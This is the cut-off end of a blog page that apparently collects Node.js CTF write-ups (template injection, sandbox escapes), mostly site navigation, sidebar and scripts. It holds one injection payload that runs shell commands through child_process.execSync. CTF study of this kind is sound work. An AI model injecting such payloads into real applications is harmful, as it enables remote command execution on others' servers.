class="line">process.mainModule.require(&quot;child_process&quot;).execSync(&quot;ls&quot;).toString()</span><br><span class="line"></span><br></pre></td></tr></table></figure>




    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2019/10/22/RoarCTFwp/" rel="prev" title="RoarCTF 2019复现">
      <i class="fa fa-chevron-left"></i> RoarCTF 2019复现
    </a></div>
      <div class="post-nav-item">
    <a href="/2019/12/19/qwb-copperstudy-record/" rel="next" title="copperstudy-record">
      copperstudy-record <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#NPUCTF-2020-%E9%AA%8C%E8%AF%81%F0%9F%90%8E"><span class="nav-number">1.</span> <span class="nav-text">NPUCTF 2020 验证🐎</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%98%A5%E7%A7%8B%E6%88%98%E7%96%AB%E8%B5%9B-Ez-express"><span class="nav-number">2.</span> <span class="nav-text">春秋战疫赛 Ez_express</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2019-XNUCA-hardjs-%E5%A4%8D%E7%8E%B0"><span class="nav-number">3.</span> <span class="nav-text">2019 XNUCA hardjs 复现</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#jade-pug-%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5"><span class="nav-number">3.1.</span> <span class="nav-text">jade pug 模板注入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%99%8E%E7%AC%A6%E6%9D%AF-2020-JustEscape"><span class="nav-number">4.</span> <span class="nav-text">虎符杯 2020 JustEscape</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="ch4ser"
      src="/images/sabito.jpg">
  <p class="site-author-name" itemprop="name">ch4ser</p>
  <div class="site-description" itemprop="description">向阳十八载，回首也无晴</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">25</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ch4ser-go" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ch4ser-go" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:ch4ser.go@gmail.com" title="E-Mail → mailto:ch4ser.go@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://t.me/darkch4ser" title="Telegram → https:&#x2F;&#x2F;t.me&#x2F;darkch4ser" rel="noopener" target="_blank"><i class="fab fa-telegram fa-fw"></i>Telegram</a>
      </span>
      <span class="links-of-author-item">
        <a href="/atom.xml" title="RSS → &#x2F;atom.xml"><i class="fa fa-rss fa-fw"></i>RSS</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      My Lovely Friends
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://l0x1c.github.io/" title="https:&#x2F;&#x2F;l0x1c.github.io&#x2F;" rel="noopener" target="_blank">l0x1c</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://forever404.cn/" title="https:&#x2F;&#x2F;forever404.cn" rel="noopener" target="_blank">Forever</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://yml-sec.top/" title="https:&#x2F;&#x2F;yml-sec.top&#x2F;" rel="noopener" target="_blank">YeMoLi</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://althims.com/" title="https:&#x2F;&#x2F;althims.com" rel="noopener" target="_blank">Moyu</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://handsomedog.top/" title="http:&#x2F;&#x2F;handsomedog.top" rel="noopener" target="_blank">Handsomedog</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://fightingtree.github.io/" title="http:&#x2F;&#x2F;fightingtree.github.io" rel="noopener" target="_blank">FightingTree</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://sunian19.github.io/" title="https:&#x2F;&#x2F;sunian19.github.io&#x2F;" rel="noopener" target="_blank">SuNian</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://blog.cnxfs.com.cn/" title="https:&#x2F;&#x2F;blog.cnxfs.com.cn&#x2F;" rel="noopener" target="_blank">xiangfangsong</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ch4ser</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  
  <script>
    (function(){
      var canonicalURL, curProtocol;
      //Get the <link> tag
      var x=document.getElementsByTagName("link");
		//Find the last canonical URL
		if(x.length > 0){
			for (i=0;i<x.length;i++){
				if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){
					canonicalURL=x[i].href;
				}
			}
		}
    //Get protocol
	    if (!canonicalURL){
	    	curProtocol = window.location.protocol.split(':')[0];
	    }
	    else{
	    	curProtocol = canonicalURL.split(':')[0];
	    }
      //Get current URL if the canonical URL does not exist
	    if (!canonicalURL) canonicalURL = window.location.href;
	    //Assign script content. Replace current URL with the canonical URL
      !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})();
  </script>















  

  

</body>
</html>
